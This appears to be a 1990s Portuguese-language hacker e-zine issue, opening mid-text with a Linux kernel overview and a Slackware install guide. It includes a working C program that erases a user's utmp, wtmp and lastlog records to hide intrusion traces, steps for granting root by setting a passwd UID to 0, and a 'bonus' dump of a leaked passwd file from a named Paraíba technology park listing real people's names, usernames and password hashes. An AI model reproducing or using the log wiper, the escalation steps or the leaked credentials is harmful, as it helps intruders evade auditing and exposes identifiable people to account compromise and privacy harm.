	 Regula o delay loop (calcula o numero "BogoMips").
         Checa se a interrupcao 16 esta trabalhando com o co-processador.

        Finalmente, o kernel esta pronto para move_to_user_mode(), em seguida
        fork (bifurca) o processo de inicializacao, cujos ccdigos estao no
        mesmo arquivo fonte. E o processo numero 0, tambem chamado idle task
        (tarefa preguicosa), se mantem rodando em um loop infinito.
        O processo de inicializacao tenta executar  /etc/init, ou /bin/init,
        ou /sbin/init.
        Se nenhum deles tem sucesso, o codigo se desvia para "/bin/sh /etc/rc"
        e cria um root shell no primeiro terminal (console). Este codigo e
        remanescente do Linux 0.01, quando o S.O. era feito para um kernel
        stand-alone, e nao havia processo de login.
        Depois de exec() o programa de inicializacao de um dos lugares padrao
        (deve haver um deles), o kernel nao tem controle direto sobre o fluxo
        do programa. Sua funcao, de agora em diante, e prover processos atraves
        de chamadas ao sistema (system calls), assim como prover eventos para
        servicos assincronos (como uma interrupcao do hardware). A multitarefa
        esta inicializada, e inicializara o gerenciamento de acesso a multi-
        usuarios, atraves do fork() e processos de login.
	Estando o kernel carregado e provendo servico, vamos prosseguir dando
        uma olhada nesses servicos ("system calls").

 Gerencia de processo pelo kernel

        Do ponto de vista do kernel, um processo e uma entrada na tabela de
        processos. Nada mais.
        A tabela de processos, entao, e uma das mais importantes estruturas
        de dados no sistema, conjuntamente com a tabela de gerenciamento de
        memoria e o buffer cache. O item individual na tabela de processos e
        a estrutura task_struct, definida em include/linux/sched.h. Com a
        task_struct, tanto informacoes de baixo quanto de alto nivel, sao
        mantidas * variando da copia de alguns registradores de hardware ate
        o inode do diretorio de trabalho para o processo.
        A tabela de processos e tanto um array quanto uma lista duplamente
        ligada, como uma arvore. A implementacao fisica e um array estatico
        de ponteiros, cujo tamanho e NR_TASKS, uma constante definida em
        include/linux/tasks.h, e cada estrutura reside em uma pagina de
        memoria reservada. A estrutura da lista esta entre os ponteiros
        next_task e prev_task, a estrutura em arvore e um tanto complexa, e
        nao sera descrita aqui. Voce pode desejar mudar NR_TASKS do seu valor
        default (que e 128), mas esteja certo de que ha dependencias, e sera
        necessario recompilar todos os arquivos fonte envolvidos.
	Depois do boot, o kernel esta sempre trabalhando em um dos processos, e a variavel global "current", um ponteiro para um item da task_struct, e usado para guardar o processo que esta rodando. A variavel "current" so e mudada pelo scheduler, em kernel/sch
ed.c. Quando, porem, todos os processos necessitarem estar looked, a macro for_each_task e usada. Isto e consideravelmente mais rapido que uma procura seqц╪encial no array.
        Um processo esta sempre rodando em ou em "modo usuario" ou em
        "modo kernel". O corpo principal de um programa de usuario e executado
        em modo usuario e chamadas a sistema sao executados em modo kernel. A
        pilha usada pelos processos netes dois modos de execucao sao diferentes
        * um seguimento de pilha convencional e usado para o modo usuario,
        enquanto uma pilha de tamanho fixo (uma pagina, cujo processo e dono)
        e usada no modo kernel. A pagina de pilha para o modo kernel nunca e
        swapped out, porque ela pode estar disponivel sempre que um system
        call e introduzido.
        Chamadas a sistema (System calls), no kernel do Linux, sao como funcoes
        da linguagem C, seu nome "oficial" esta prefixado por "sys_". Uma
        chamada a sistema de nome, por exemplo, burnout invoca a funcao de
        kernel sys_burnout().

        O mecanismo de chamadas a sistema (System calls) esta descrito no
        capitulo 3 do Linux Kernel Hackers' Guide
        (http://www.redhat.com:8080/HyperNews/get/khg.html). Uma olhada em
        for_each_task e SET_LINKS, em include/linux/sched.h pode ajudar a
        entender a lista e a estrutura de arvore da tabela de processos.

.----------------.
| Apagando LOGS!! \__________________________________________________________
`----------------------------------------------------------------------------'
                               by SaTaNfAcE

	Esta parte eh muito util  para apagar os rastros deixados no sistema
        por qualquer usuario. A primeira coisa q deve-se fazer eh voce apagar
        o conteudo do arquivo /home/user/.bash_history. Esse arquivo loga todos
        os comando executados pelo usuario durante sua permanencia no sistema!!
        Vc tb fica loado no WTMP, UTMP e LASTLOG que pode  ser visualizado pelo
        root pelo comando last user.
        Aih vai um prg em C com finalidade de apagar esses logs!!

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

#############################
##   Copyright (c) 1997    ##
##    The Death Knights    ##
#############################

#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;

  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
     while(read (f, &amp;utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                 bzero((char *)&amp;utmp_ent,sizeof( utmp_ent ));
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &amp;utmp_ent, sizeof (utmp_ent));
            }
     close(f);
  }
}

void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;

    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {

     while(pos != -1L) {
        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
        if (read (f, &amp;utmp_ent, sizeof (struct utmp))<0) {
          pos = -1L;
        } else {
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
               bzero((char *)&amp;utmp_ent,sizeof(struct utmp ));
               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
               write (f, &amp;utmp_ent, sizeof (utmp_ent));
               pos = -1L;
          } else pos += 1L;
        }
     }
     close(f);
  }
}

void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

     if ((pwd=getpwnam(who))!=NULL) {

        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog),
0);
            bzero((char *)&amp;newll,sizeof( newll ));
            write(f, (char *)&amp;newll, sizeof( newll ));
            close(f);
        }

    } else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
    printf("Error.\n");
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

.-----------.
| COOL STUFF \_______________________________________________________________
`----------------------------------------------------------------------------'
                                 by SaTaNfAcE

Alterando Permissoess de Arquivos:

        Em sistemas UNIX existem uma verdadeira hierarquia em relacao a
        arquivos!! Apenas o root e users com UID 0 tem acessos a todos esses
        arquivos!! Para aterar uma permissao no linux utilizaremos o comando
        chmod!!

	-rwxr-xr-x   2  user  512  Mar  22  15:25  joltt

 O primeiro traco indica se o arquivo se o arquivo eh um diretorio( d ), um
 link( l ) ou se ele eh um arquivo usual se nao existir alguma letra no 1o
 traco! Os outros 9 tracos sendo compostos todos por r(read), w(write),
 x(execute) sendo os 3 primeiro campos o do owner do arquivo, os tres
 seguintes o do group e os tres posterioriores de usuarios comuns.
o - owner
g - group
u - todos usuarios

	-rwxr-xr-x   2  user  512  Mar  22  15:25  joltt

Entao para alterar a permissoes para executar o arquivo do owner do arquivo
eu daria o seguinte comando:

	chmod o-x joltt              - Entao ficaria:

	-rw-r-xr-x   2  user  512  Mar  22  15:25  joltt

E assim por diante!! Qualquer duvida quanto a isso email-us ou de um man chmod!!

	Transformando um usuario comum em root!!(estou presupondo q vc jah
        tenha root na mahquina senao tiver use a imaginacao)

	Isto eh muito simples d00d!! Transformar um usuarios normal com
        poderes de root eh soh mudar o UID deste ultimo para o UID igual ao
        do root, ou seja 0!!

	E como faco isso??

		Isso eh simples, vc vai ter q fazer o seguinte:

vc vai ter q ir no arquivo passwd encontrado no dir /etc e alterar o UID para 0

	Aih vao os procedeimentor:

		cd /etc  ------->> para entrar no dir /etc
                              pico passwd -------------->> se nao possuir o pico utilize outro editor de texto como vi, joe

	Entao aparecera na tela:

root:x:0:0:root of all evil,,,,:/root:/bin/bash
cacaio:x:1018:100:Cacaio:/home/cacaio:/bin/bash
blydd:x:1021:100:BlydD:/home/mosca:/bin/bash
                          |
                       UID

 Agora eh muito simples, altere esse numero para 0 salve e log com o
 respectivo login e perceba que vc agora estah com poderes de root!!

     Isso eh tudo d00dz!! Por falta de tempo as matehrias nao ficaram maiored,
     melhor, nem avancadas!! Proxima edicao virao os xploits, algum tutorial
     CGI algumas coisa desse tipo!! dependendo da procura dos leitores deta
     zine!! Por enquanto eh isso, espero q tenham gostado!!
     A cada edicao o nivel de dificuldade ira alumentar cada vez mais!!
     Eh isso aih d00d aproveitem!!

                                     SaTaNfAcE

.---------------------.
| How to install Linux \_____________________________________________________
`----------------------------------------------------------------------------'

                                       by pIst0lS

   Bem, estava de saco cheio de ficar respondendo perguntas absurdas sobre
como instalar o Linux. Se voce esta quebrando a cabeca aqui esta o seu
remedio. Aqui eu irei escrever uma instalacao do Slack Ware 3.1 versao CDROM
para uma particao no seu HD.
   Para voce instalar o Linux e necessario, um CDROM IDE, um disco rigido com
400 Mb livres que e o recomendado para uma instalacao de Linux e uns disk
formatados em DOS. Depois voce vera pra que serve.
   Para comecar, voce presisa de 2 diskettes, uma de boot e outra de root.
A de boot como o nome indica e a que vai fazer a inicializacao do seu sistema
A de root e o sistema em miniatura chama-se minix. Depois de ter lido o boot
insira o diskette de root. Para fazeres os diskettes iniciais e necessario
ir ao direterio bootdsks.144 do teu CDROM, leia o arquivo WHICH.ONE onde tera
uma tabela especificando qual a imagem que devera ser usado  para o teu
hardware, mais presisamente o teu CDROM. Como examplo  vamus usar o bare.i q
e para CDROM IDE. Para criar um diskette com o bare.i use o rawrite. Apos vc
digitar ele lhe perguntara qual a imagem que queres criar no disk
( digite bare.i ) e pergunta onde queres criar. Digite a: . Depois de teres
criado o diskette de boot, tera que criar o diskette de root que esta no
diretorio rootdsks e que geralmente e a color.gz, repita o mesmo procedimento
com o diskette de root. Depois de teres os dois diskettes criados, esta na
hora de arranar o sistema. Enfie o diskette de boot em seu drive ( RESET ),
quando ele pedir a de root, enfie a de root no drive, que aparecera login,
digite "root". Agora voce chegou na linha de comando, digite fdisk para criar
as particoes para o seu novo sistema. Voce ira criar duas particoes, uma para
o Linux, e outra particao para o SWAP ( Memoria Virtual ). Dentro do fdisk,
digite "n" ( Add New Partition ), digite "p" ( Primary Partition ), diga 2
porque se voce tiver uma outra particao de DOS ou RWIN95 essas serao a
primeira. Depois ele te pede o First Cilinder, veja o exemplo a seguir.
First Cilinder (205-1200), digite sempre o primeiro numero do First Cilinder,
depois ele pede o Last Cilinder, ai sera a quantidade que voce ira botar para
a particao, digite +40MB, com isso ele criara um particao de 40 MB. Agora
devemos avisa que essa particao pertence ao SWAP, para isso digite "t"
( Change Partition Type ) e ele pede o numero da particao. Lembre-se, digite
"2", a seguir ele pedi o codigo da particao. Digie "L" para ver a lista de
codigo, observe o nц╨uero da particao de SWAP, e digite 82. Voce acabou de
criar uma particao de 40 MB destinana para o SWAP ( Memoria Virtual ). Agora
falta criar a particao para o Sistema. Repita os mesmo passos, porem o numero
da particao sera "3". Agora temos q fazer o First Cilinder. Digamos que o
First Cilinder (560-1200), lembre-se, sera o primeiro numero. Last Cilinder
sera o 1200, com isso voce deixara o resto de seu HD para essa particao. Nao
e presiso mudar o tipo de particao porque ele inicia com a particao Linux
Native. Apos ter feito tudo isso digite "w" ( Write Table to Disk and Exit ).
Tire o diskette de root do drive e enfie o diskette de boot e de "Reset" na
maquina.
    Voce conclui um dos primeiro passos. Repita os mesmos procedimentos
anteriores, insira o diskette de boot, ate pedir o diskette de root e quando
aparecer o login digite "setup". Ira aparecer uma tela cheia das opcoes para
escolher. Bom, a primeira a coisa a ser feito e o KeyMap, como nao tem a
versao em Portugues, escolha a versao em Ingles. O KeyMap pode ser alterado
quando voce quiser. Depois ira pedir onde querem instalar o Linux ( ENTER
YOUR TARGET PARTITION ) e digite onde esta a particao de Linux Native, no
exemplo criamos na particao 3 ( /dev/hda3 ), depois pergunta qual e a
particao de SWAP, particao 2 ( /dev/hda2 ). Depois ira lhe perguntar se voce
quer montar um filesystem, claro que sim, digite o diretorio que querem monta
o DOS, digite /dosc ( Agora voce podera acessar o DOS digitando cd /dosc e
voce estara em seu C:\ ), depois ele ira lhe perguntar em que particao esta o
DOS, neste caso /dev/hda1 . A seguir ele ira pedir "Enter Your Source Media",
selecionem "Install From CDROM". Selecionem a opcao "Try to Scan Your CDROM",
se nao encontraremee porque vocц╙ pegou o diskette de boot errado, ( Leia o
arquivo WHICH.ONE ) mas vamos dizer se ele achou o seu CDROM. Apos isso ele
pergunta que tipo de instalacao voce que faze, diga "Normall Instalation".
Depois ira pedir que tipo de instalacao, selecione a opcao "Expert". A seguir
ira aparecer um quado com "Disk Sets". Vou lhe dizer o que e recomendavel
instalar.

     A - Basic Linux System -> Tem tudo para o seu sistema operativo
                               ( Instala )
     AP - Various Application -> Varios utilitarios ( Instala )

     D - Program Development -> Compiladores e Linguagens de programacao
                                ( Instala )
     E - Gnu EMACS -> ( Nao Instalar )

     F - FAQ Lists -> Muito bom ( Instala )

     K - Linux Kernel Source -> A maior parte dos programas presisa disso.
                                ( Instala )
     N - NetWorking -> Internet
                       ( Instala )
     T - teX Type Setting -> ( Nao Instala )

     TCL/TK -> Essencial para fazer BOT; linguagem de programacao
               ( Instala )
     X - Xfree Window System -> "Windows para Linux"
                                ( Opcional )
     XAP - XApplication -> Application para a opcao "x"
                           ( Caso tenha instalado a opcao "X" Insatale esse )
     XD - X Server Development Kit -> Para programadores
                                      ( Instala )
     XVIEW -> Image View ( JPG )
              ( Opcional )
     Games -> Jogos
              ( Opcional )

     Depois de ter feito tudo isso, tudo ok! Agora espere uns 20 minutos e
tera o Linux instalado.

.---------.
| E-MAiLZ  \_________________________________________________________________
`----------------------------------------------------------------------------'

        Bem.. como este e' o primeiro numero do zine, nao temos nenhum mail!
Hehehe... e claro que nao! :P
        Mas os mails que chegarem serao lidos e TALVEZ respondidos ou publi-
cados.
        Quer saber qual o nosso mail? Larga de ser preguicoso e vai procurar
que tem ai' pelo zine! =)

        Cya!

.----------.
| BONUS [1] \________________________________________________________________
`----------------------------------------------------------------------------'
                                by ReNeGaDe

Para voces nao sairem reclamando resolvemos colocar um bonus! Um pedaco do
passwd da paqtc para voces! La vai...

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

root:x:0:1:Gerencia da Rede:/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
leonidas:x:0:27:Usuario:/u/leonidas:/bin/ksh
zzgomes:ftB7kVmCfR5Bw:575:110:Maria Jose Gomes da Silva - DDI/UFPB:/u/zzgomes:/bin/ksh
coepb:eD2abf8qym5xk:200:50:Centro de Operacoes da RNP na Paraiba:/u/coepb:/bin/ksh
saulo:OubTIEbE1QmS.:140:52:Saulo Pereira - PaqTc-Pb:/u/saulo:/bin/ksh
seictpb:Jg0jIaegLHMys:563:25:Sistema Estadual de Informacao em Ciencia e Tecnologia - SEICT-PB:/u/seictpb:/bin/ksh
marifat:W/RWZRfHBmpz2:524:110:Maria de Fatima Marreiro de Sousa - DSA/CH:/u/marifat:/bin/ksh
franci:90O10FuzQm6yU:254:52:Francilene Procopio Garcia - PaqTc:/u/franci:/bin/ksh
pedrosa:FcGRZaFgDtvRo:127:52:Jose cavalcante Pedrosa Junior - DEC/CCT:/u/pedrosa:/bin/ksh
andrade:rjACwx/HwD2mk:551:110:Elizabeth Cristina de Andrade Lima - CH/UFPB:/u/andrade:/bin/ksh
infocon:vhKa2.v4mzla.:272:51:Empresa Light/Infocon :/u/infocon:/bin/ksh
camelo:OQhA0hQDqnsJ.:133:52:Maria de Fatima Camelo - Genesis:/u/camelo:/bin/ksh
jane:gQRHKm7VFKZrY:263:52:Jane Fontes Gadelha - Paqtc:/u/jane:/bin/ksh
kenia:QGovn3DDzp0oY:201:53:Kenia Samara - SoftEX 2000:/u/kenia:/bin/ksh
lgregis:WH6dY8.A6y7Ck:530:52:Luiz Geraldo Sena de Oliveira Regis - APEL/PaqTc-Pb:/u/lgregis:/bin/ksh
luizm:p832NEu/OR3cY:227:100:Luiz Mauricio - Green Software:/u/luizm:/bin/ksh
mauricio:MLJiSnmDfsDhs:266:100:Mauricio Galimberti - Green:/u/mauricio:/bin/ksh
mqueiroz:E37mtUUSf867Y:573:13:Messias Firmino de Queiroz - PEASA/UFPB:/u/mqueiroz:/bin/ksh
cci:PF8FVaWHG4x1g:383:27:CCI Informatica - PaqTcPb:/u/cci:/bin/ksh
jgomes:pyc7VJORvvvSw:343:52:Jose Gomes da Silva Sobrinho - PaqTc :/home/jgomes:/bin/ksh
nivaldo:u8.meS/8Or5jc:229:100:Nivaldo Regis Junior - Green:/u/nivaldo:/bin/ksh
cdlcg:Po1mtiAH.TFP.:579:116:Camara de Dirigentes Lojistas de Campina Grande - CDL-CG / PaqTc-Pb:/u/cdlcg:/bin/ksh
op:cwYL6HSfNmSnE:778:101:Office Pak:/usr/lib/op:/bin/ksh
cherie:AS1oIOm.PzTGU:538:110:Maria do Socorro Oliveira Brasileiro - CH/UFPB:/u/cherie:/bin/ksh
paqtcpb:cdytb3FBYTCMw:222:52:Parque Tecnologico da Paraiba:/u/paqtcpb:/bin/ksh
silvia:k6I6M0FYOeCd2:409:27:Silvia Patricia de Paiva Teles - Poligene:/u/silvia:/bin/ksh
sictct:tsYZmRoMGN6RU:134:52:Sec. de Ind., Com., Turismo, Ciencia e Tec. da Paraiba - SICTCT:/u/sictct:/bin/ksh
ppdesign:TWYK4E3JunTmE:281:52:PPDedign - Programa Paraibano de Design:/u/ppdesign:/bin/ksh
ailton:bh85w4ibVoBxc:527:110:Ailton Elisiario de Sousa / CH-UFPB:/u/ailton:/bin/ksh
joca:0PYAyCsFl2N7s:526:110:Joao Batista Guedes - DDI/UFPB:/u/joca:/bin/ksh
fiepb:S8TZ1q2/8csGw:415:27:Federacao das Industrias do Estado da Paraiba:/u/fiepb:/bin/ksh
sergio:XY7keNA5cxdCQ:234:105:Sergio Torres - SAACI:/u/sergio:/bin/ksh
smartech:NdR0A6iIAKWuk:525:52:Smartech Solucoes Computacionais Ltda. - SoftEX 2000:/u/smartech:/bin/ksh
celb:Bl0Pjt5hghTJE:132:52:Compania de Eletrificacao da Borborema - CELB/Paqtc:/u/celb:/bin/ksh
telmo:qp5fLOtYTls/U:267:52:Telmo Araujo - PaqTc:/u/telmo:/bin/ksh
medeiros:1udvanQl5riAM:129:60001:Eduardo Sergio Sousa Medeiros - PaqTcPb:/u/medeiros:/bin/ksh
vicente:lmodOQoorybH6:257:52:Vicente de Paulo A. Araujo - PaqTc:/u/vicente:/bin/ksh
ivaldo:13BfvvymiftbA:137:52:Jose Ivaldo Barbosa de Brito - DCA/UFPB:/u/ivaldo:/bin/ksh
pbtur:LorUnNqN8Lig6:151:52:Empresa Paraibana de Turismo - PBTUR:/u/pbtur:/bin/ksh
carmelo:Kx9INvUemrrns:154:25:Maria do Carmelo - Fapesq:/u/carmelo:/bin/ksh
margus:zd209Y4HCkZQw:299:52:Marcelo Beserra Gusmao - PaqTcPb:/u/margus:/bin/ksh
herbert:8IgPCSgaUDXg6:274:52:Herbert L. S. da Rocha - Paqtc:/u/herbert:/bin/ksh
vega:dSA.rr0YSEiZ2:156:52:Vega Ind. e Com. Ltda. - PaqTcPb:/u/vega:/bin/ksh
apel:3pGggRz4GZ34c:529:52:APEL - Aplicacoes Eletronicas Ltda.:/u/apel:/bin/ksh
alberto:ue5HXi3s7De3c:283:52:Alberto Jose Santos Ramos - PaqTc:/u/alberto:/bin/ksh
antonio:bOVxCKEcXIOPo:284:52:Antonio Loureiro Gomes - PaqTc:/u/antonio:/bin/ksh
salomao:e.nfWbNATMJe.:286:52:Francisco Salomao de Medeiros - PaqTc:/u/salomao:/bin/ksh
rosario:Z.0CghxDykq6.:119:52:Paroquia N. Sra. do Rosario - PaqTc-Pb:/u/rosario:/bin/ksh
socorro:NewBP1REjNJV.:294:52:Maria do Socorro Tavares Vieira - PaqTc:/u/socorro:/bin/ksh
ton:ufHvLgqagmPYs:388:52:Marcos Antonio Lima Sousa - PaqTc:/home/ton:/bin/ksh
mario:WNchuZbhK8dO6:296:52:Mario de Sousa Araujo Filho - PaqTc:/u/mario:/bin/ksh
rangel:ouEMpwvpip35c:393:27:Wellington Rangel dos Santos - SEICT-PB:/u/rangel:/bin/ksh
romao:OSIUoGyKm6X0M:298:52:Paulo Romao Ferreira - PaqTc:/u/romao:/bin/ksh
chico:BtarEJ5DGcs0Y:384:52:Francisco Wanderley Cirne - PaqTc-PB:/home/chico:/bin/ksh
lobao:DJOWbJ5jsWvVY:329:110:Sonia Maria Barbosa de Souza - CCBS/UFPB:/u/lobao:/bin/ksh
vilma:JFBc1AZZWkX4.:354:110:Vilma Lucia Fonseca Mendoza - CCBS/UFPB:/u/vilma:/bin/ksh
sales:iy5XfCSntz6p6:178:110:Maria das Neves Porto de Andrade - CCBS/UFPB:/u/sales:/bin/ksh
ana:rt13Fw3LloJSA:306:52:Ana Maria Vilar Campos Catao - PaqTc:/u/ana:/bin/ksh
ernandes:j7pREU8sWCwvM:391:52:Ernandes Lopes Bezerra - PaqTc-PB:/u/ernandes:/bin/ksh
carlos:DRJ/.v0VR1aXU:311:52:Carlos Alberto de Amorim Figueiredoe - PaqTc:/u/carlos:/bin/ksh
softex:X1hAqKtf0pycU:407:27:CGSoft - Softex 2000:/u/softex:/bin/ksh
divan:eTFuLEVP6SX2w:313:52:Divan Soares da Silva - PaqTc:/u/divan:/bin/ksh
heber:exRWmxqs3t.No:385:52:Heber Sivini Ferreira - PaqTc-PB:/home/heber:/bin/ksh
jbezerra:6840yAYFT4qZs:532:110:Jose Bezerra da Silva - DEC/UFPB:/u/jbezerra:/bin/ksh
pzootec:Y7oMw7BuwAr8M:323:13:Programa de Pos-Graduacao em Zootecnia - PEASA/UFPB:/u/pzootec:/bin/ksh
everton:/Ugvpc1tOEiiE:325:52:Everton Lucena Dantas - PaqTc:/u/everton:/bin/ksh
paulinho:mKrzY2s8l3/Ys:326:52:Paulo Marcelo Campos Meira - PaqTc:/u/paulinho:/bin/ksh
rburiti:g/mShrN4j.p4o:375:110:Ricardo Arlen Buriti da Costa - CCT/UFPB:/u/rburiti:/bin/ksh
telpa:9yOHRToD7xZtQ:576:27:Telecomunicacoes da Paraiba S/A - TELPA:/u/telpa:/bin/ksh
ofarias:CjEyumuq7a6Wg:331:52:Odete Emidio de Farias - PaqTc:/u/ofarias:/bin/ksh
edilson:7N/15GCIlXV3I:332:52:Edilson Eulalio Cabral - PaqTc:/u/edilson:/bin/ksh
laine:w4hc6oPdRpyHM:334:52:Ghislaine Duque - PaqTc:/u/laine:/bin/ksh
mondeo:LT/y66id8V9Is:567:52:Cicero Ciro de Albuquerque Braga - PaqTc-Pb:/u/mondeo:/bin/ksh
abrantes:ehO94eU7t7WQk:114:110:Josefa Neumira de Abrantes Sarmento - CCJS/DEBDP:/u/abrantes:/bin/ksh
ag009bnb:yKsucBP9OxnWw:288:52:BNB - Agencia 009 - PaqTcPb:/u/ag009bnb:/bin/ksh
joberto:M2fWEPfDyWAzo:338:52:Joberto Sergio B. Martins - PaqTc:/home/joberto:/bin/ksh
lemarx:g905V5gn.ZsWk:344:52:Lemarx Farias Cavalcanti - PaqTc:/home/lemarx:/bin/ksh
lia:9slUPA6RQy9.2:520:110:Lia Monica Rossi - DDI/CCT:/u/lia:/bin/ksh
prbarros:hPBZ4g3qdQfjc:461:110:Pericles Rezende Barros - CCT/UFPB:/u/prbarros:/bin/ksh
emir:aFLPFqIXtmcy6:172:110:Emir Candeia Gurjao - CCT/UFPB:/u/emir:/bin/ksh
srobson:.61DEBuYqDndo:352:52:Robson Pequeno de Sousa - PaqTc:/home/srobson:/bin/ksh
jovany:BxAodVUYPDIOk:355:52:Jovany Luis Alves de Medeiros - PaqTc:/home/jovany:/bin/ksh
fernande:NUGWKnghbmvM6:356:52:Fernando Fernandes Vieira - PaqTc:/home/fernande:/bin/ksh
oliveira:vw7qo7TI6NgO6:528:110:Rui de Oliveira - CCT/UFPB:/u/oliveira:/bin/ksh
juan:tuQcQYrhMJdoI:360:52:Juan Carlos Ceballos - PaqTc:/home/juan:/bin/ksh
rajarao:lLr7R3z90C12w:361:52:Tumkur Rajarao Gopinath - PaqTc:/home/rajarao:/bin/ksh
chagas:7zYvnqOlJIf6w:362:52:Francisco das Chagas Fernandes Guerra - PaqTc:/home/chagas:/bin/ksh
jax:UZAbg1W2EPgdc:139:52:Jurandir Antonio Xavier - PaqTcPb:/u/jax:/bin/ksh
fabio:ljj3U8s8Vu36s:366:52:Fabio Fernando Barboza de Freitas - PaqTc:/home/fabio:/bin/ksh
nogueira:WqNW6RAMFiIl6:540:110:Gustavo Mauricio Filgueiras Nogueira - CH/UFPB:/u/nogueira:/bin/ksh
agnello:qhN4UEG0CpwHg:369:52:Agnello Jose de Amorim - PaqTc:/home/agnello:/bin/ksh
andrea:r0Fe7auHe0sAo:370:52:Andrea de Amorim Pereira Barros - PaqTc:/home/andrea:/bin/ksh
dilma:QJHAdQfZ.ljlA:373:52:Dilma Maria Ramos Gomes - PaqTc:/home/dilma:/bin/ksh
agra:PffqqSUrbEX6E:548:52:Walter de Agra Junior - PaqTc-Pb:/u/agra:/bin/ksh
gadelha:SGt5/FCyNDN.s:382:52:Antonio Gadelha da Costa - PaqTc:/home/gadelha:/bin/ksh
france2:F7s./iRSC58Uo:392:52:Francicleide Procopio Garcia - PaqTc-PB:/u/france2:/bin/ksh
deoneves:pudjxFlduJTho:259:27:Derlopidas Gomes Neves Neto:/u/deoneves:/bin/ksh
kilpp:3R0N3gIPqzQX.:244:13:Renato Kilpp - PEASA/UFPB:/u/kilpp:/bin/ksh
saraiva:HC0uZ9WvImgW2:214:110:Maria de Assis Saraiva - CCBS/UFPB:/u/saraiva:/bin/ksh
aasilva:hfPwQTjERpXVA:400:52:Antonio Augusto Silva - PaqTc-PB:/home/aasilva:/bin/ksh
eleny:G5/yWgAG9CH0w:403:52:Eleny Gianini - PaqTc-PB:/u/eleny:/bin/ksh
jorge:XgF8q3v1sBAog:404:52:Jorge Roberto de Oliveira Cabral - PaqTc-PB:/u/jorge:/bin/ksh
gutemb:Blyp5ZTsYAs06:405:52:Jose Gutembergue de Assis Lira - PaqTc-PB:/u/jose:/bin/ksh
eventos:9xrRgzimgvwFw:406:52:Setor de Eventos-PaqTc-PB:/u/eventos:/bin/ksh
mfactory:Q.ZltoZoRnfbw:568:52:Media Factory S. C. Consultoria Ltda. - PaqTc-Pb:/u/mfactory:/bin/ksh
helena:.EjDv9L6axb5Y:353:52:Maria Helena Silva Soares - PaqTcPb:/u/helena:/bin/ksh
majord:Dw3q.dMSzxWZk:413:24:Servidor de Listas Majordomo:/u/majord:/bin/ksh
ftargino:uog7ZUvOtu7y2:188:110:Fatima Aparecida Saldanha Targino - CCBS/UFPB:/u/ftargino:/bin/ksh
gladimir:FgRMWsjTfRFzY:255:27:Gladimir Araujo Ferreira - PaqTcPb:/u/gladimir:/bin/ksh
adeilma:mMYPaByEQfq.Q:457:52:Adeilma de Siqueira - PaqTc-PB:/u/adeilma:/bin/ksh
caminha:B18Ukjirc.WVk:418:52:Alexandre de Queiroz Caminha - PaqTc/PB:/u/caminha:/bin/ksh
angelo:evwYQIyB4BkyA:419:52:Angelo Giuseppe Chaves Alves:/u/angelo:/bin/ksh
nil:3pkQ.PYxqIHz6:420:52:Josenilson Pereira Santana - Prof.DEM/CCT -PaqTc-PB.:/home/nil:/bin/ksh
afreire:7ri6Y49CzhytY:422:52:Alberto Freire dos Santos - SEINF - PaqTc:/u/afreire:/bin/ksh
tjordao:/tjge31nmXoCc:574:110:Mercilia Tavares Jordao - CH/UFPB:/u/tjordao:/bin/ksh
barros:7uKR6wvL.h7BY:149:52:Marcelo Alves de Barros - CGSoft:/u/barros:/bin/ksh
assis:Y/DAV3h7AmRdE:497:110:Francisco de Assis Santos e Silva - DEAG/UFPB:/u/assis:/bin/ksh
sbea:x5QkMOnXs3WzQ:100:13:Sociedade Brasileira de Engenharia Agricola - SBEA/SUEP:/u/sbea:/bin/ksh
fapesq:pe5aieNH6WtQ2:104:60001:Fapesq - Fundacao de Apoio a Pesquisa do Estado da Paraiba:/u/fapesq:/bin/ksh
bonates:av2/wPNBe/tv6:103:25:Eduardo Jorge Lira Bonates - Fapesq:/u/bonates:/bin/ksh
buega:b1o7a5YbKoYgY:504:27:Francisco de Assis Benevides Gadelha:/u/buega:/bin/ksh
denise:Q9/N3QcLYKtVo:136:25:Denise Machado - Fapesq:/u/denise:/bin/ksh
wsmota:xAHY1X2Ledqzo:113:52:Wellington sAntos Mota - DEE/CCT - PaqTc:/u/wsmota:/bin/ksh
curso:rYdkoM/OKyxwk:292:110:Cursos do PaqTcPb:/u/curso:/bin/ksh
lamart:uWM5hxTR708DU:443:52:Jose Lamartine da Costa - DME - UEPB:/u/lamart:/bin/ksh
aguiar:EqJSHmW1wkspo:118:52:Jose Aguiar barbosa Maia - Suep/Prai :/u/aguiar:/bin/ksh
